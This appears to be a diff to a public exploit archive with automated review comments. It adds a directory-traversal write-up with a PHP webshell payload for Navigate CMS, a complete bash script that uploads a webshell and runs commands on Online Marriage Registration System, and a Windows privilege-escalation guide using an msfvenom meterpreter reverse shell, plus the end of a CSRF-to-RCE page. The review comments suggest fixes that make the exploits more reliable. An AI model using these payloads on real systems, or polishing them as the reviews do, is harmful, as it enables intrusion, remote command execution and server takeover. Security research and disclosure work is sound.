x00\x00\x04\x00\x04\x00\x4f\x01\x00\x00\xfe\x01\x00\x00\x00\x00"
    fileUpload(c, "chiv.zip");
};

start();
</script>
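Review bot: the title says "Add Admin", but what the page forges is a plugin upload to `navigate.php?fid=extensions&act=extension_upload` whose zip contains `chiv/chiv.php` with `system($_GET['cmd'])` (readable from the embedded bytes), i.e. CSRF to RCE; the title and the comment block should describe that. In the script, `xhr.setRequestHeader("Content-Length", fileSize)` names a forbidden header that browsers silently drop, and `$("#goto").show()` calls jQuery that this page never loads, so the `status == 0` branch throws; remove both. `addField` and `addFileField` wrap `name=` and `filename=` in single quotes where RFC 7578 specifies double quotes, so use `\"` to get the same parse on every server. The PoC also depends on the victim's admin session cookie being attached to a cross-site POST, which browsers that default cookies to SameSite=Lax will not do unless the cookie is set with `SameSite=None; Secure`; state that precondition next to "Tested on". Finally, in this rendering the `var c = "\x50\x4b..."` literal is wrapped onto a second line at `\x5` / `b\x27`; it must be a single line for the script to parse.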
29
exploits/php/webapps/48550.txt
Normal file
@ -0,0 +1,29 @@
# Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://www.navigatecms.com/en/home
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
# Version: 2.8.7
# Tested on: Ubuntu
# CVE: CVE-2020-13795

A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data.

For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example:
`/var/www/html/navigate/private/1/templates/`

My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`).

My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php`

Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example:

Traversal payload:
`../../../navigate.php`

PHP Code execution payload:
```
<?php
system($_GET['cmd']);
?>
```
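Review bot: "read and write to any file on the webserver as www-data" overstates the impact; the template editor runs as the web server user, so only files that user can read or write are reachable, and the example write target `../../../navigate.php` overwrites the application's own front controller, which is destructive and noisy. A new file under a directory www-data can write to demonstrates RCE without breaking the install. The write-up should also name the request and parameter that carry the path (the template create/edit form field), since that is what CVE-2020-13795 will be matched against, and spell out that both `../../../` payloads resolve from `private/1/templates/` to the `navigate/` root. Precondition worth stating: the account must have template-editing rights, so this is an admin or editor level bug.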
52
exploits/php/webapps/48552.sh
Executable file
@ -0,0 +1,52 @@
# Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-31
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 / Xampp Server and Wamp Server
# CVE : N/A
# Notes : Exploit Requires Authentication But You Can Register As User For Free, This Is Enough To Exploit System

#!/bin/bash
echo "# Online Marriage Registration System 1.0 ---> Remote Code Execution"
echo "# Author ---> Selim Enes Karaduman"
echo "# Usage ---> ./exploit.sh -u TARGET_URL(e.g http://10.10.10.10/omrs/ -m MOBILE_NUMBER -p PASSWORD -c COMMAND"
while getopts u:m:p:c: par
do
    case $par in
        u) url=$OPTARG ;;
        m) mnum=$OPTARG ;;
        p) passwd=$OPTARG ;;
        c) command=$OPTARG ;;
    esac
done
sess=$(curl -s -i -X POST $url/user/login.php -d "mobno=$mnum&password=$passwd&login=" | grep -F "Set-Cookie" | sed 's/;//g' | cut -d " " -f 2)
url_for_req=$(echo $url | cut -d "/" -f 3)
function upload(){
curl -i -s -k -X $'POST' \
-H $"Host: $url_for_req" -H $'Content-Type: multipart/form-data; boundary=---------------------------8759967759481129101498329242' -H $"Cookie: $sess" -H $'Content-Length: 3244' \
-b $"$sess" \
--data-binary $'-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"dom\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofhusband\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"husimage\"; filename=\"a.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0aecho system($_GET[\'cmd\']);\x0a?>\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"haddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofwife\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wifeimage\"; filename=\"test.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0ahi\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; 
name=\"wreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamef\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressfirst\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnames\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddresssec\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamet\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressthird\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"submit\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------8759967759481129101498329242--\x0d\x0a' \
$"$url/user/marriage-reg-form.php" >>/dev/null
}
upload

#Execute the given command
shell_file=$(curl -s $url/user/images/ | grep ".php" | grep -Eo 'href="[^\"]+"' | sed 's/href=//g' | sed 's/\"//g' | grep -m1 '')


check=$(echo $command | grep " " | wc -l)
if [[ $check > 0 ]]
then
    fixed_command=$(echo $command | sed 's/ /%20/g')
    curl -s "$url/user/images/$shell_file?cmd=$fixed_command"
else
    curl -s "$url/user/images/$shell_file?cmd=$command"
fi


echo "IF YOU DONT GET RESPONSE OF THE COMMAND YOU GAVE, PROBABLY YOU GAVE WRONG CREDENTIALS"
echo "After first exploit, even if you give wrong credentials it'll work since the file is already uploaded"
shift $((OPTIND-1))
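Review bot: `#!/bin/bash` sits after the header comments, so it is not a shebang and `./exploit.sh` runs under whatever `/bin/sh` is on the box (the `[[ ]]` and `function` syntax then may not work); move it to line 1 or document `bash exploit.sh`. The upload is never verified: `shell_file` takes the first `.php` link from a directory listing of `/user/images/`, which needs autoindex enabled and picks up any earlier upload rather than the file just sent, so upload under a unique name and request it directly, and check the login POST's response instead of telling the user a missing response "probably" means bad credentials. Smaller points: the usage string lacks the closing parenthesis after the example URL; `-H "Content-Length: 3244"` hardcodes a length curl computes itself and breaks as soon as the body changes; `-H "Cookie: $sess"` and `-b "$sess"` send the cookie twice; `[[ $check > 0 ]]` is a string comparison, so use `-gt` or drop the branch and always encode with `curl -G --data-urlencode "cmd=$command"`; the trailing `shift $((OPTIND-1))` does nothing. In this rendering the `--data-binary` argument is wrapped onto a second line at `Content-Disposition: form-data; ` / `name=\"wreligion\"`; it is one quoted argument in the original.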
53
exploits/windows/local/48543.txt
Normal file
@ -0,0 +1,53 @@
# Title: IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path
|
||||
# Author: Gobinathan L
|
||||
# Date: 2020-06-03
|
||||
# Vendor Homepage: https://www.iobit.com
|
||||
# Software Link: https://www.iobit.com/en/advanceduninstaller.php
|
||||
# Version : 9.5.0.15
|
||||
# Tested on: Windows 10 64bit(EN)
|
||||
|
||||
About Unquoted Service Path :
|
||||
==============================
|
||||
|
||||
When a service is created whose executable path contains spaces and isn't enclosed within quotes,
|
||||
leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges.
|
||||
(only if the vulnerable service is running with SYSTEM privilege level which most of the time it is).
|
||||
|
||||
Steps to recreate :
|
||||
=============================
|
||||
|
||||
1. Open CMD and Check for USP vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
|
||||
2. The Vulnerable Service would Show up.
|
||||
3. Check the Service Permissions by typing [ sc qc IObitUnSvr ]
|
||||
4. The command would return..
|
||||
|
||||
C:\>sc qc IObitUnSvr
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
SERVICE_NAME: IObitUnSvr
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 0 IGNORE
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : IObit Uninstaller Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
5. This concludes that the service is running as SYSTEM. "Highest privilege in a machine"
|
||||
6. Now create a Payload with msfvenom or other tools and name it to IObit.exe
|
||||
7. Make sure you have write Permissions to "C:\Program Files (x86)\IObit" directory.
|
||||
8. Provided that you have right permissions, Drop the IObit.exe executable you created into the "C:\Program Files (x86)\IObit" Directory.
|
||||
9. Now restart the IObit Uninstaller service by giving coommand [ sc stop IObitUnSvr ] followed by [ sc start IObitUnSvr ]
|
||||
10. If your payload is created with msfvenom, quickly migrate to a different process. [Any process since you have the SYSTEM Privilege].
|
||||
|
||||
During my testing :
|
||||
|
||||
Payload : msfvenom -p windows/meterpreter/reverse_tcp -f exe -o IObit.exe
|
||||
Migrate : meterpreter> run post/windows/manage/migrate [To migrate into a different Process ]
|
||||
|
||||
# Disclaimer :
|
||||
=========================
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information.
The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
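Review bot: the precondition in step 7 (write access to C:\Program Files (x86)\IObit) is asserted but never evidenced; on a default Windows install a standard user cannot write under Program Files (x86), so the advisory should include that directory's ACL (for example the output of `icacls "C:\Program Files (x86)\IObit"`) or state plainly that exploitation needs an account that already has write access there, since the `sc qc` output in step 4 only shows the unquoted path and the LocalSystem account, not who can write to the search path. The advisory also gives no remediation: quoting the binary path removes the lookup ambiguity, e.g. `sc config IObitUnSvr binPath= "\"C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe\""`, and that belongs next to the detection one-liner in step 1. Minor: "coommand" in step 9.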
@ -11084,6 +11084,7 @@ id,file,description,date,author,type,platform,port
48507,exploits/windows/local/48507.py,"VUPlayer 2.49 .m3u - Local Buffer Overflow (DEP_ASLR)",2020-05-22,Gobinathan,local,windows,
48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows,
48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows,
48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -42768,3 +42769,19 @@ id,file,description,date,author,type,platform,port
48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php,
48538,exploits/php/webapps/48538.txt,"Clinic Management System 1.0 - Authentication Bypass",2020-06-02,BKpatron,webapps,php,
48539,exploits/php/webapps/48539.txt,"OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)",2020-06-02,"Kailash Bohara",webapps,php,
48541,exploits/hardware/webapps/48541.py,"AirControl 1.4.2 - PreAuth Remote Code Execution",2020-06-04,0xd0ff9,webapps,hardware,
48542,exploits/php/webapps/48542.txt,"Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)",2020-06-04,Enesdex,webapps,php,
48544,exploits/php/webapps/48544.txt,"Clinic Management System 1.0 - Unauthenticated Remote Code Execution",2020-06-04,BKpatron,webapps,php,
48545,exploits/php/webapps/48545.py,"Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)",2020-06-04,"Gus Ralph",webapps,php,
48546,exploits/php/webapps/48546.txt,"Oriol Espinal CMS 1.0 - 'id' SQL Injection",2020-06-04,TSAR,webapps,php,
48547,exploits/php/webapps/48547.txt,"Clinic Management System 1.0 - Authenticated Arbitrary File Upload",2020-06-04,BKpatron,webapps,php,
48548,exploits/php/webapps/48548.txt,"Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)",2020-06-04,"Gus Ralph",webapps,php,
48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java,
48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php,
48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware,
48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php,
48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware,
48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,
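Review bot: two description strings in this hunk carry typos that will propagate to every search against this CSV: entry 48545 has a doubled opening quote in `''sidx'` and entry 48549 spells the vendor `VMWAre`; suggest `'sidx'` and `VMware` before merge. Also the added ids run 48554, 48556 with no 48555 in this hunk; fine if that id was deliberately skipped, but the commit message should say so.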